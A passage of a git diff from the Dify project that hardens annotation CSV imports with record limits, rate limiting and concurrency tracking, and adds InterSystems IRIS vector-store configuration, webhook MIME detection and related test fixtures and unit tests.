CSV with row limit to prevent memory exhaustion + # Use chunksize for memory-efficient processing + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + min_records = dify_config.ANNOTATION_IMPORT_MIN_RECORDS + + # Read CSV in chunks to avoid loading entire file into memory + df = pd.read_csv( + file.stream, + dtype=str, + nrows=max_records + 1, # Read one extra to detect overflow + engine="python", + on_bad_lines="skip", # Skip malformed lines instead of crashing + ) + + # Validate column count + if len(df.columns) < 2: + raise ValueError("Invalid CSV format. The file must contain at least 2 columns (question and answer).") + + # Build result list with validation + result: list[dict] = [] + for idx, row in df.iterrows(): + # Stop if we exceed the limit + if len(result) >= max_records: + raise ValueError( + f"The CSV file contains too many records. Maximum {max_records} records allowed per import. " + f"Please split your file into smaller batches." 
+                    )
+
+                # Extract and validate question and answer
+                try:
+                    question_raw = row.iloc[0]
+                    answer_raw = row.iloc[1]
+                except (IndexError, KeyError):
+                    continue  # Skip malformed rows
+
+                # Convert to string and strip whitespace
+                question = str(question_raw).strip() if question_raw is not None else ""
+                answer = str(answer_raw).strip() if answer_raw is not None else ""
+
+                # Skip empty entries or NaN values
+                if not question or not answer or question.lower() == "nan" or answer.lower() == "nan":
+                    continue
+
+                # Validate length constraints (idx is pandas index, convert to int for display)
+                row_num = int(idx) + 2 if isinstance(idx, (int, float)) else len(result) + 2
+                if len(question) > 2000:
+                    raise ValueError(f"Question at row {row_num} is too long. Maximum 2000 characters allowed.")
+                if len(answer) > 10000:
+                    raise ValueError(f"Answer at row {row_num} is too long. Maximum 10000 characters allowed.")
+
+                content = {"question": question, "answer": answer}
                 result.append(content)
-            if len(result) == 0:
-                raise ValueError("The CSV file is empty.")
-            # check annotation limit
+
+            # Validate minimum records
+            if len(result) < min_records:
+                raise ValueError(
+                    f"The CSV file must contain at least {min_records} valid annotation record(s). "
+                    f"Found {len(result)} valid record(s)."
+                )
+
+            # Check annotation quota limit
             features = FeatureService.get_features(current_tenant_id)
             if features.billing.enabled:
                 annotation_quota_limit = features.annotation_quota_limit
@@ -359,12 +455,34 @@
             # async job
             job_id = str(uuid.uuid4())
             indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}"
-            # send batch add segments task
+
+            # Register job in active tasks list for concurrency tracking
+            current_time = int(naive_utc_now().timestamp() * 1000)
+            active_jobs_key = f"annotation_import_active:{current_tenant_id}"
+            redis_client.zadd(active_jobs_key, {job_id: current_time})
+            redis_client.expire(active_jobs_key, 7200)  # 2 hours TTL
+
+            # Set job status
             redis_client.setnx(indexing_cache_key, "waiting")
             batch_import_annotations_task.delay(str(job_id), result, app_id, current_tenant_id, current_user.id)
-        except Exception as e:
+
+        except ValueError as e:
             return {"error_msg": str(e)}
-        return {"job_id": job_id, "job_status": "waiting"}
+        except Exception as e:
+            # Clean up active job registration on error (only if job was created)
+            if job_id is not None:
+                try:
+                    active_jobs_key = f"annotation_import_active:{current_tenant_id}"
+                    redis_client.zrem(active_jobs_key, job_id)
+                except Exception:
+                    # Silently ignore cleanup errors - the job will be auto-expired
+                    logger.debug("Failed to clean up active job tracking during error handling")
+
+            # Surface the underlying parsing/processing error with context
+            error_str = str(e)
+            return {"error_msg": f"An error occurred while processing the file: {error_str}"}
+
+        return {"job_id": job_id, "job_status": "waiting", "record_count": len(result)}
 
     @classmethod
     def get_annotation_hit_histories(cls, app_id: str, annotation_id: str, page, limit):
diff --git a/api/services/dataset_service.py b/api/services/dataset_service.py
index 8097a6daa0..970192fde5 100644
--- a/api/services/dataset_service.py
+++ b/api/services/dataset_service.py
@@ -1419,7 +1419,7 @@
             document.name = name
 
         db.session.add(document)
-        if document.data_source_info_dict:
+        if document.data_source_info_dict and "upload_file_id" in document.data_source_info_dict:
             db.session.query(UploadFile).where(
                 UploadFile.id == document.data_source_info_dict["upload_file_id"]
             ).update({UploadFile.name: name})
@@ -2817,20 +2817,20 @@
                     db.session.add(binding)
                 db.session.commit()
-                # save vector index
-                try:
-                    VectorService.create_segments_vector(
-                        [args["keywords"]], [segment_document], dataset, document.doc_form
-                    )
-                except Exception as e:
-                    logger.exception("create segment index failed")
-                    segment_document.enabled = False
-                    segment_document.disabled_at = naive_utc_now()
-                    segment_document.status = "error"
-                    segment_document.error = str(e)
-                    db.session.commit()
-                segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first()
-                return segment
+                # save vector index
+                try:
+                    keywords = args.get("keywords")
+                    keywords_list = [keywords] if keywords is not None else None
+                    VectorService.create_segments_vector(keywords_list, [segment_document], dataset, document.doc_form)
+                except Exception as e:
+                    logger.exception("create segment index failed")
+                    segment_document.enabled = False
+                    segment_document.disabled_at = naive_utc_now()
+                    segment_document.status = "error"
+                    segment_document.error = str(e)
+                    db.session.commit()
+                segment = db.session.query(DocumentSegment).where(DocumentSegment.id == segment_document.id).first()
+                return segment
         except LockNotOwnedError:
             pass
diff --git a/api/services/rag_pipeline/rag_pipeline.py b/api/services/rag_pipeline/rag_pipeline.py
index 097d16e2a7..f53448e7fe 100644
--- a/api/services/rag_pipeline/rag_pipeline.py
+++ b/api/services/rag_pipeline/rag_pipeline.py
@@ -1248,14 +1248,13 @@
             session.commit()
             return workflow_node_execution_db_model
 
-    def get_recommended_plugins(self) -> dict:
+    def get_recommended_plugins(self, type: str) -> dict:
         # Query active recommended plugins
-        pipeline_recommended_plugins = (
-            db.session.query(PipelineRecommendedPlugin)
-            .where(PipelineRecommendedPlugin.active == True)
-            .order_by(PipelineRecommendedPlugin.position.asc())
-            .all()
-        )
+        query = db.session.query(PipelineRecommendedPlugin).where(PipelineRecommendedPlugin.active == True)
+        if type and type != "all":
+            query = query.where(PipelineRecommendedPlugin.type == type)
+
+        pipeline_recommended_plugins = query.order_by(PipelineRecommendedPlugin.position.asc()).all()
 
         if not pipeline_recommended_plugins:
             return {
diff --git a/api/services/trigger/webhook_service.py b/api/services/trigger/webhook_service.py
index 4b3e1330fd..5c4607d400 100644
--- a/api/services/trigger/webhook_service.py
+++ b/api/services/trigger/webhook_service.py
@@ -33,6 +33,11 @@ from services.errors.app import QuotaExceededError
 from services.trigger.app_trigger_service import AppTriggerService
 from services.workflow.entities import WebhookTriggerData
 
+try:
+    import magic
+except ImportError:
+    magic = None  # type: ignore[assignment]
+
 logger = logging.getLogger(__name__)
 
@@ -317,7 +322,8 @@
         try:
             file_content = request.get_data()
             if file_content:
-                file_obj = cls._create_file_from_binary(file_content, "application/octet-stream", webhook_trigger)
+                mimetype = cls._detect_binary_mimetype(file_content)
+                file_obj = cls._create_file_from_binary(file_content, mimetype, webhook_trigger)
                 return {"raw": file_obj.to_dict()}, {}
             else:
                 return {"raw": None}, {}
@@ -341,6 +347,18 @@
             body = {"raw": ""}
         return body, {}
 
+    @staticmethod
+    def _detect_binary_mimetype(file_content: bytes) -> str:
+        """Guess MIME type for binary payloads using python-magic when available."""
+        if magic is not None:
+            try:
+                detected = magic.from_buffer(file_content[:1024], mime=True)
+                if detected:
+                    return detected
+            except Exception:
+                logger.debug("python-magic detection failed for octet-stream payload")
+        return "application/octet-stream"
+
     @classmethod
     def _process_file_uploads(
         cls, files: Mapping[str, FileStorage], webhook_trigger: WorkflowWebhookTrigger
diff --git a/api/services/variable_truncator.py b/api/services/variable_truncator.py
index 6eb8d0031d..0f969207cf 100644
--- a/api/services/variable_truncator.py
+++ b/api/services/variable_truncator.py
@@ -410,9 +410,12 @@ class VariableTruncator(BaseTruncator):
     @overload
     def _truncate_json_primitives(self, val: None, target_size: int) -> _PartResult[None]: ...
 
+    @overload
+    def _truncate_json_primitives(self, val: File, target_size: int) -> _PartResult[File]: ...
+
     def _truncate_json_primitives(
         self,
-        val: UpdatedVariable | str | list[object] | dict[str, object] | bool | int | float | None,
+        val: UpdatedVariable | File | str | list[object] | dict[str, object] | bool | int | float | None,
         target_size: int,
     ) -> _PartResult[Any]:
         """Truncate a value within an object to fit within budget."""
@@ -425,6 +428,9 @@
             return self._truncate_array(val, target_size)
         elif isinstance(val, dict):
             return self._truncate_object(val, target_size)
+        elif isinstance(val, File):
+            # File objects should not be truncated, return as-is
+            return _PartResult(val, self.calculate_json_size(val), False)
         elif val is None or isinstance(val, (bool, int, float)):
             return _PartResult(val, self.calculate_json_size(val), False)
         else:
diff --git a/api/tasks/annotation/batch_import_annotations_task.py b/api/tasks/annotation/batch_import_annotations_task.py
index 8e46e8d0e3..775814318b 100644
--- a/api/tasks/annotation/batch_import_annotations_task.py
+++ b/api/tasks/annotation/batch_import_annotations_task.py
@@ -30,6 +30,8 @@ def batch_import_annotations_task(job_id: str, content_list: list[dict], app_id:
     logger.info(click.style(f"Start batch import annotation: {job_id}", fg="green"))
     start_at = time.perf_counter()
     indexing_cache_key = f"app_annotation_batch_import_{str(job_id)}"
+    active_jobs_key = f"annotation_import_active:{tenant_id}"
+
     # get app info
     app = db.session.query(App).where(App.id == app_id, App.tenant_id == tenant_id, App.status == "normal").first()
 
@@ -91,4 +93,13 @@
         redis_client.setex(indexing_error_msg_key, 600, str(e))
         logger.exception("Build index for batch import annotations failed")
     finally:
+        # Clean up active job tracking to release concurrency slot
+        try:
+            redis_client.zrem(active_jobs_key, job_id)
+            logger.debug("Released concurrency slot for job: %s", job_id)
+        except Exception as cleanup_error:
+            # Log but don't fail if cleanup fails - the job will be auto-expired
+            logger.warning("Failed to clean up active job tracking for %s: %s", job_id, cleanup_error)
+
+        # Close database session
         db.session.close()
diff --git a/api/tasks/clean_dataset_task.py b/api/tasks/clean_dataset_task.py
index 8608df6b8e..b4d82a150d 100644
--- a/api/tasks/clean_dataset_task.py
+++ b/api/tasks/clean_dataset_task.py
@@ -9,6 +9,7 @@ from core.rag.index_processor.index_processor_factory import IndexProcessorFacto
 from core.tools.utils.web_reader_tool import get_image_upload_file_ids
 from extensions.ext_database import db
 from extensions.ext_storage import storage
+from models import WorkflowType
 from models.dataset import (
     AppDatasetJoin,
     Dataset,
@@ -18,9 +19,11 @@
     DatasetQuery,
     Document,
     DocumentSegment,
+    Pipeline,
     SegmentAttachmentBinding,
 )
 from models.model import UploadFile
+from models.workflow import Workflow
 
 logger = logging.getLogger(__name__)
 
@@ -34,6 +37,7 @@ def clean_dataset_task(
     index_struct: str,
     collection_binding_id: str,
     doc_form: str,
+    pipeline_id: str | None = None,
 ):
     """
     Clean dataset when dataset deleted.
@@ -135,6 +139,14 @@
         # delete dataset metadata
         db.session.query(DatasetMetadata).where(DatasetMetadata.dataset_id == dataset_id).delete()
         db.session.query(DatasetMetadataBinding).where(DatasetMetadataBinding.dataset_id == dataset_id).delete()
+        # delete pipeline and workflow
+        if pipeline_id:
+            db.session.query(Pipeline).where(Pipeline.id == pipeline_id).delete()
+            db.session.query(Workflow).where(
+                Workflow.tenant_id == tenant_id,
+                Workflow.app_id == pipeline_id,
+                Workflow.type == WorkflowType.RAG_PIPELINE,
+            ).delete()
         # delete files
         if documents:
             for document in documents:
diff --git a/api/tasks/delete_account_task.py b/api/tasks/delete_account_task.py
index fb5eb1d691..cb703cc263 100644
--- a/api/tasks/delete_account_task.py
+++ b/api/tasks/delete_account_task.py
@@ -2,6 +2,7 @@ import logging
 
 from celery import shared_task
 
+from configs import dify_config
 from extensions.ext_database import db
 from models import Account
 from services.billing_service import BillingService
@@ -14,7 +15,8 @@ logger = logging.getLogger(__name__)
 def delete_account_task(account_id):
     account = db.session.query(Account).where(Account.id == account_id).first()
     try:
-        BillingService.delete_account(account_id)
+        if dify_config.BILLING_ENABLED:
+            BillingService.delete_account(account_id)
     except Exception:
         logger.exception("Failed to delete account %s from billing service.", account_id)
         raise
diff --git a/api/tests/integration_tests/.env.example b/api/tests/integration_tests/.env.example
index e508ceef66..acc268f1d4 100644
--- a/api/tests/integration_tests/.env.example
+++ b/api/tests/integration_tests/.env.example
@@ -55,7 +55,7 @@ WEB_API_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,*
 CONSOLE_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,*
 
 # Vector database configuration
-# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase
+# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase, iris
 VECTOR_STORE=weaviate
 # Weaviate configuration
 WEAVIATE_ENDPOINT=http://localhost:8080
@@ -64,6 +64,20 @@ WEAVIATE_GRPC_ENABLED=false
 WEAVIATE_BATCH_SIZE=100
 WEAVIATE_TOKENIZATION=word
 
+# InterSystems IRIS configuration
+IRIS_HOST=localhost
+IRIS_SUPER_SERVER_PORT=1972
+IRIS_WEB_SERVER_PORT=52773
+IRIS_USER=_SYSTEM
+IRIS_PASSWORD=Dify@1234
+IRIS_DATABASE=USER
+IRIS_SCHEMA=dify
+IRIS_CONNECTION_URL=
+IRIS_MIN_CONNECTION=1
+IRIS_MAX_CONNECTION=3
+IRIS_TEXT_INDEX=true
+IRIS_TEXT_INDEX_LANGUAGE=en
+
 # Upload configuration
 UPLOAD_FILE_SIZE_LIMIT=15
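The new IRIS settings mirror the `IrisVectorConfig` fields used by the integration test further down. A minimal sketch of wiring them up from the environment, assuming the config class accepts exactly these keyword fields:

```python
import os

from core.rag.datasource.vdb.iris.iris_vector import IrisVectorConfig

# Defaults below mirror the .env.example values above.
config = IrisVectorConfig(
    IRIS_HOST=os.getenv("IRIS_HOST", "localhost"),
    IRIS_SUPER_SERVER_PORT=int(os.getenv("IRIS_SUPER_SERVER_PORT", "1972")),
    IRIS_USER=os.getenv("IRIS_USER", "_SYSTEM"),
    IRIS_PASSWORD=os.getenv("IRIS_PASSWORD", ""),
    IRIS_DATABASE=os.getenv("IRIS_DATABASE", "USER"),
    IRIS_SCHEMA=os.getenv("IRIS_SCHEMA", "dify"),
    IRIS_CONNECTION_URL=os.getenv("IRIS_CONNECTION_URL") or None,
    IRIS_MIN_CONNECTION=int(os.getenv("IRIS_MIN_CONNECTION", "1")),
    IRIS_MAX_CONNECTION=int(os.getenv("IRIS_MAX_CONNECTION", "3")),
    IRIS_TEXT_INDEX=os.getenv("IRIS_TEXT_INDEX", "true").lower() == "true",
    IRIS_TEXT_INDEX_LANGUAGE=os.getenv("IRIS_TEXT_INDEX_LANGUAGE", "en"),
)
```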
"opendal") +os.environ.setdefault("OPENDAL_SCHEME", "fs") _CACHED_APP = create_app() diff --git a/api/tests/integration_tests/vdb/iris/__init__.py b/api/tests/integration_tests/vdb/iris/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/integration_tests/vdb/iris/test_iris.py b/api/tests/integration_tests/vdb/iris/test_iris.py new file mode 100644 index 0000000000..49f6857743 --- /dev/null +++ b/api/tests/integration_tests/vdb/iris/test_iris.py @@ -0,0 +1,44 @@ +"""Integration tests for IRIS vector database.""" + +from core.rag.datasource.vdb.iris.iris_vector import IrisVector, IrisVectorConfig +from tests.integration_tests.vdb.test_vector_store import ( + AbstractVectorTest, + setup_mock_redis, +) + + +class IrisVectorTest(AbstractVectorTest): + """Test suite for IRIS vector store implementation.""" + + def __init__(self): + """Initialize IRIS vector test with hardcoded test configuration. + + Note: Uses 'host.docker.internal' to connect from DevContainer to + host OS Docker, or 'localhost' when running directly on host OS. + """ + super().__init__() + self.vector = IrisVector( + collection_name=self.collection_name, + config=IrisVectorConfig( + IRIS_HOST="host.docker.internal", + IRIS_SUPER_SERVER_PORT=1972, + IRIS_USER="_SYSTEM", + IRIS_PASSWORD="Dify@1234", + IRIS_DATABASE="USER", + IRIS_SCHEMA="dify", + IRIS_CONNECTION_URL=None, + IRIS_MIN_CONNECTION=1, + IRIS_MAX_CONNECTION=3, + IRIS_TEXT_INDEX=True, + IRIS_TEXT_INDEX_LANGUAGE="en", + ), + ) + + +def test_iris_vector(setup_mock_redis) -> None: + """Run all IRIS vector store tests. + + Args: + setup_mock_redis: Pytest fixture for mock Redis setup + """ + IrisVectorTest().run_all_tests() diff --git a/api/tests/test_containers_integration_tests/conftest.py b/api/tests/test_containers_integration_tests/conftest.py index 180ee1c963..d6d2d30305 100644 --- a/api/tests/test_containers_integration_tests/conftest.py +++ b/api/tests/test_containers_integration_tests/conftest.py @@ -138,9 +138,9 @@ class DifyTestContainers: logger.warning("Failed to create plugin database: %s", e) # Set up storage environment variables - os.environ["STORAGE_TYPE"] = "opendal" - os.environ["OPENDAL_SCHEME"] = "fs" - os.environ["OPENDAL_FS_ROOT"] = "storage" + os.environ.setdefault("STORAGE_TYPE", "opendal") + os.environ.setdefault("OPENDAL_SCHEME", "fs") + os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage") # Start Redis container for caching and session management # Redis is used for storing session data, cache entries, and temporary data @@ -348,6 +348,13 @@ def _create_app_with_containers() -> Flask: """ logger.info("Creating Flask application with test container configuration...") + # Ensure Redis client reconnects to the containerized Redis (no auth) + from extensions import ext_redis + + ext_redis.redis_client._client = None + os.environ["REDIS_USERNAME"] = "" + os.environ["REDIS_PASSWORD"] = "" + # Re-create the config after environment variables have been set from configs import dify_config @@ -486,3 +493,29 @@ def db_session_with_containers(flask_app_with_containers) -> Generator[Session, finally: session.close() logger.debug("Database session closed") + + +@pytest.fixture(scope="package", autouse=True) +def mock_ssrf_proxy_requests(): + """ + Avoid outbound network during containerized tests by stubbing SSRF proxy helpers. 
+ """ + + from unittest.mock import patch + + import httpx + + def _fake_request(method, url, **kwargs): + request = httpx.Request(method=method, url=url) + return httpx.Response(200, request=request, content=b"") + + with ( + patch("core.helper.ssrf_proxy.make_request", side_effect=_fake_request), + patch("core.helper.ssrf_proxy.get", side_effect=lambda url, **kw: _fake_request("GET", url, **kw)), + patch("core.helper.ssrf_proxy.post", side_effect=lambda url, **kw: _fake_request("POST", url, **kw)), + patch("core.helper.ssrf_proxy.put", side_effect=lambda url, **kw: _fake_request("PUT", url, **kw)), + patch("core.helper.ssrf_proxy.patch", side_effect=lambda url, **kw: _fake_request("PATCH", url, **kw)), + patch("core.helper.ssrf_proxy.delete", side_effect=lambda url, **kw: _fake_request("DELETE", url, **kw)), + patch("core.helper.ssrf_proxy.head", side_effect=lambda url, **kw: _fake_request("HEAD", url, **kw)), + ): + yield diff --git a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py index ea61747ba2..d612e70910 100644 --- a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py +++ b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py @@ -113,16 +113,31 @@ class TestShardedRedisBroadcastChannelIntegration: topic = broadcast_channel.topic(topic_name) producer = topic.as_producer() subscriptions = [topic.subscribe() for _ in range(subscriber_count)] + ready_events = [threading.Event() for _ in range(subscriber_count)] def producer_thread(): - time.sleep(0.2) # Allow all subscribers to connect + deadline = time.time() + 5.0 + for ev in ready_events: + remaining = deadline - time.time() + if remaining <= 0: + break + if not ev.wait(timeout=max(0.0, remaining)): + pytest.fail("subscriber did not become ready before publish deadline") producer.publish(message) time.sleep(0.2) for sub in subscriptions: sub.close() - def consumer_thread(subscription: Subscription) -> list[bytes]: + def consumer_thread(subscription: Subscription, ready_event: threading.Event) -> list[bytes]: received_msgs = [] + # Prime subscription so the underlying Pub/Sub listener thread starts before publishing + try: + _ = subscription.receive(0.01) + except SubscriptionClosedError: + return received_msgs + finally: + ready_event.set() + while True: try: msg = subscription.receive(0.1) @@ -137,7 +152,10 @@ class TestShardedRedisBroadcastChannelIntegration: with ThreadPoolExecutor(max_workers=subscriber_count + 1) as executor: producer_future = executor.submit(producer_thread) - consumer_futures = [executor.submit(consumer_thread, subscription) for subscription in subscriptions] + consumer_futures = [ + executor.submit(consumer_thread, subscription, ready_events[idx]) + for idx, subscription in enumerate(subscriptions) + ] producer_future.result(timeout=10.0) msgs_by_consumers = [] @@ -240,8 +258,7 @@ class TestShardedRedisBroadcastChannelIntegration: for future in as_completed(producer_futures, timeout=30.0): sent_msgs.update(future.result()) - subscription.close() - consumer_received_msgs = consumer_future.result(timeout=30.0) + consumer_received_msgs = consumer_future.result(timeout=60.0) assert sent_msgs == consumer_received_msgs diff --git a/api/tests/test_containers_integration_tests/services/test_webhook_service.py 
diff --git a/api/tests/test_containers_integration_tests/services/test_webhook_service.py b/api/tests/test_containers_integration_tests/services/test_webhook_service.py
index 8328db950c..e3431fd382 100644
--- a/api/tests/test_containers_integration_tests/services/test_webhook_service.py
+++ b/api/tests/test_containers_integration_tests/services/test_webhook_service.py
@@ -233,7 +233,7 @@ class TestWebhookService:
             "/webhook",
             method="POST",
             headers={"Content-Type": "multipart/form-data"},
-            data={"message": "test", "upload": file_storage},
+            data={"message": "test", "file": file_storage},
         ):
             webhook_trigger = MagicMock()
             webhook_trigger.tenant_id = "test_tenant"
@@ -242,7 +242,7 @@
 
             assert webhook_data["method"] == "POST"
             assert webhook_data["body"]["message"] == "test"
-            assert "upload" in webhook_data["files"]
+            assert "file" in webhook_data["files"]
 
             # Verify file processing was called
             mock_external_dependencies["tool_file_manager"].assert_called_once()
@@ -414,7 +414,7 @@
             "data": {
                 "method": "post",
                 "content_type": "multipart/form-data",
-                "body": [{"name": "upload", "type": "file", "required": True}],
+                "body": [{"name": "file", "type": "file", "required": True}],
             }
         }
diff --git a/api/tests/unit_tests/conftest.py b/api/tests/unit_tests/conftest.py
index f484fb22d3..c5e1576186 100644
--- a/api/tests/unit_tests/conftest.py
+++ b/api/tests/unit_tests/conftest.py
@@ -26,16 +26,29 @@
 redis_mock.hgetall = MagicMock(return_value={})
 redis_mock.hdel = MagicMock()
 redis_mock.incr = MagicMock(return_value=1)
 
+# Ensure OpenDAL fs writes to tmp to avoid polluting workspace
+os.environ.setdefault("OPENDAL_SCHEME", "fs")
+os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage")
+os.environ.setdefault("STORAGE_TYPE", "opendal")
+
 # Add the API directory to Python path to ensure proper imports
 import sys
 
 sys.path.insert(0, PROJECT_DIR)
 
-# apply the mock to the Redis client in the Flask app
 from extensions import ext_redis
 
-redis_patcher = patch.object(ext_redis, "redis_client", redis_mock)
-redis_patcher.start()
+
+def _patch_redis_clients_on_loaded_modules():
+    """Ensure any module-level redis_client references point to the shared redis_mock."""
+
+    import sys
+
+    for module in list(sys.modules.values()):
+        if module is None:
+            continue
+        if hasattr(module, "redis_client"):
+            module.redis_client = redis_mock
 
 
 @pytest.fixture
@@ -49,6 +62,15 @@ def _provide_app_context(app: Flask):
         yield
 
 
+@pytest.fixture(autouse=True)
+def _patch_redis_clients():
+    """Patch redis_client to MagicMock only for unit test executions."""
+
+    with patch.object(ext_redis, "redis_client", redis_mock):
+        _patch_redis_clients_on_loaded_modules()
+        yield
+
+
 @pytest.fixture(autouse=True)
 def reset_redis_mock():
     """reset the Redis mock before each test"""
@@ -63,3 +85,20 @@
     redis_mock.hgetall.return_value = {}
     redis_mock.hdel.return_value = None
     redis_mock.incr.return_value = 1
+
+    # Keep any imported modules pointing at the mock between tests
+    _patch_redis_clients_on_loaded_modules()
+
+
+@pytest.fixture(autouse=True)
+def reset_secret_key():
+    """Ensure SECRET_KEY-dependent logic sees an empty config value by default."""
+
+    from configs import dify_config
+
+    original = dify_config.SECRET_KEY
+    dify_config.SECRET_KEY = ""
+    try:
+        yield
+    finally:
+        dify_config.SECRET_KEY = original
diff --git a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py
new file mode 100644
index 0000000000..06a7b98baf
--- /dev/null
+++ b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py
@@ -0,0 +1,347 @@
+"""
+Unit tests for annotation import security features.
+
+Tests rate limiting, concurrency control, file validation, and other
+security features added to prevent DoS attacks on the annotation import endpoint.
+"""
+
+import io
+from unittest.mock import MagicMock, patch
+
+import pytest
+from pandas.errors import ParserError
+from werkzeug.datastructures import FileStorage
+
+from configs import dify_config
+
+
+class TestAnnotationImportRateLimiting:
+    """Test rate limiting for annotation import operations."""
+
+    @pytest.fixture
+    def mock_redis(self):
+        """Mock Redis client for testing."""
+        with patch("controllers.console.wraps.redis_client") as mock:
+            yield mock
+
+    @pytest.fixture
+    def mock_current_account(self):
+        """Mock current account with tenant."""
+        with patch("controllers.console.wraps.current_account_with_tenant") as mock:
+            mock.return_value = (MagicMock(id="user_id"), "test_tenant_id")
+            yield mock
+
+    def test_rate_limit_per_minute_enforced(self, mock_redis, mock_current_account):
+        """Test that per-minute rate limit is enforced."""
+        from controllers.console.wraps import annotation_import_rate_limit
+
+        # Simulate exceeding per-minute limit
+        mock_redis.zcard.side_effect = [
+            dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE + 1,  # Minute check
+            10,  # Hour check
+        ]
+
+        @annotation_import_rate_limit
+        def dummy_view():
+            return "success"
+
+        # Should abort with 429
+        with pytest.raises(Exception) as exc_info:
+            dummy_view()
+
+        # Verify it's a rate limit error
+        assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value)
+
+    def test_rate_limit_per_hour_enforced(self, mock_redis, mock_current_account):
+        """Test that per-hour rate limit is enforced."""
+        from controllers.console.wraps import annotation_import_rate_limit
+
+        # Simulate exceeding per-hour limit
+        mock_redis.zcard.side_effect = [
+            3,  # Minute check (under limit)
+            dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR + 1,  # Hour check (over limit)
+        ]
+
+        @annotation_import_rate_limit
+        def dummy_view():
+            return "success"
+
+        # Should abort with 429
+        with pytest.raises(Exception) as exc_info:
+            dummy_view()
+
+        assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value)
+
+    def test_rate_limit_within_limits_passes(self, mock_redis, mock_current_account):
+        """Test that requests within limits are allowed."""
+        from controllers.console.wraps import annotation_import_rate_limit
+
+        # Simulate being under both limits
+        mock_redis.zcard.return_value = 2
+
+        @annotation_import_rate_limit
+        def dummy_view():
+            return "success"
+
+        # Should succeed
+        result = dummy_view()
+        assert result == "success"
+
+        # Verify Redis operations were called
+        assert mock_redis.zadd.called
+        assert mock_redis.zremrangebyscore.called
+
+
+class TestAnnotationImportConcurrencyControl:
+    """Test concurrency control for annotation import operations."""
+
+    @pytest.fixture
+    def mock_redis(self):
+        """Mock Redis client for testing."""
+        with patch("controllers.console.wraps.redis_client") as mock:
+            yield mock
+
+    @pytest.fixture
+    def mock_current_account(self):
+        """Mock current account with tenant."""
+        with patch("controllers.console.wraps.current_account_with_tenant") as mock:
+            mock.return_value = (MagicMock(id="user_id"), "test_tenant_id")
+            yield mock
+
+    def test_concurrency_limit_enforced(self, mock_redis, mock_current_account):
+        """Test that concurrent task limit is enforced."""
+        from controllers.console.wraps import annotation_import_concurrency_limit
+
+        # Simulate max concurrent tasks already running
+        mock_redis.zcard.return_value = dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT
+
+        @annotation_import_concurrency_limit
+        def dummy_view():
+            return "success"
+
+        # Should abort with 429
+        with pytest.raises(Exception) as exc_info:
+            dummy_view()
+
+        assert "429" in str(exc_info.value) or "concurrent" in str(exc_info.value).lower()
+
+    def test_concurrency_within_limit_passes(self, mock_redis, mock_current_account):
+        """Test that requests within concurrency limits are allowed."""
+        from controllers.console.wraps import annotation_import_concurrency_limit
+
+        # Simulate being under concurrent task limit
+        mock_redis.zcard.return_value = 1
+
+        @annotation_import_concurrency_limit
+        def dummy_view():
+            return "success"
+
+        # Should succeed
+        result = dummy_view()
+        assert result == "success"
+
+    def test_stale_jobs_are_cleaned_up(self, mock_redis, mock_current_account):
+        """Test that old/stale job entries are removed."""
+        from controllers.console.wraps import annotation_import_concurrency_limit
+
+        mock_redis.zcard.return_value = 0
+
+        @annotation_import_concurrency_limit
+        def dummy_view():
+            return "success"
+
+        dummy_view()
+
+        # Verify cleanup was called
+        assert mock_redis.zremrangebyscore.called
+
+
+class TestAnnotationImportFileValidation:
+    """Test file validation in annotation import."""
+
+    def test_file_size_limit_enforced(self):
+        """Test that files exceeding size limit are rejected."""
+        # Create a file larger than the limit
+        max_size = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024
+        large_content = b"x" * (max_size + 1024)  # Exceed by 1KB
+
+        file = FileStorage(stream=io.BytesIO(large_content), filename="test.csv", content_type="text/csv")
+
+        # Should be rejected in controller
+        # This would be tested in integration tests with actual endpoint
+
+    def test_empty_file_rejected(self):
+        """Test that empty files are rejected."""
+        file = FileStorage(stream=io.BytesIO(b""), filename="test.csv", content_type="text/csv")
+
+        # Should be rejected
+        # This would be tested in integration tests
+
+    def test_non_csv_file_rejected(self):
+        """Test that non-CSV files are rejected."""
+        file = FileStorage(stream=io.BytesIO(b"test"), filename="test.txt", content_type="text/plain")
+
+        # Should be rejected based on extension
+        # This would be tested in integration tests
+
+
+class TestAnnotationImportServiceValidation:
+    """Test service layer validation for annotation import."""
+
+    @pytest.fixture
+    def mock_app(self):
+        """Mock application object."""
+        app = MagicMock()
+        app.id = "app_id"
+        return app
+
+    @pytest.fixture
+    def mock_db_session(self):
+        """Mock database session."""
+        with patch("services.annotation_service.db.session") as mock:
+            yield mock
+
+    def test_max_records_limit_enforced(self, mock_app, mock_db_session):
+        """Test that files with too many records are rejected."""
+        from services.annotation_service import AppAnnotationService
+
+        # Create CSV with too many records
+        max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS
+        csv_content = "question,answer\n"
+        for i in range(max_records + 100):
+            csv_content += f"Question {i},Answer {i}\n"
+
+        file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv")
+
+        mock_db_session.query.return_value.where.return_value.first.return_value = mock_app
+
